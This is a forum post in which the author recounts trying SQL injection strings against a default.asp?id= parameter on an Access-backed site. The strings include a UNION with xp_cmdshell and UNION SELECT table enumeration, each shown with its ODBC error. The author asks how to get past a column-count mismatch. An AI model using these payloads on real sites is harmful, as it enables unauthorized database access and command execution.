I originally tested possible vulnerability by trying default.asp?id=| and got the error:
[Microsoft][ODBC Microsoft Access Driver] Too few parameters. Expected 1.I figured from the error, that correct handlging wasn't in place, so I then attempted some basic strings, such as: default.asp?id=30+UNION+exec+master..xp_cmdshell+'dir'; which resulted in:
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine could not find the object 'master'. Make sure the object exists and that you spell its name and the path name correctly.
Another was: default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES; ("--" were giving me all the same error, so I figured I'd end it with a semi colon.) which resulted in:
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\WINNT\system32\INFORMATION_SCHEMA.mdb'.
Finally, I played with some possible table names and found CONFIG was valid, but when I issued the command: default.asp?id=4960 UNION SELECT TOP 1 TABLE_NAME FROM CONFIG; Which resulted in
Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
I have Googles this pretty extensivley, with no luck. No helpful information on the errors, and looking for other SQL injection info, was just yielding the same strings and type of attacks. I've played with it some, seeing that -- doesn't always work, but termination with a semi colon will, etc.
Could anyone explain some of these errors, or if you've been stuck here before, let me know what you found out?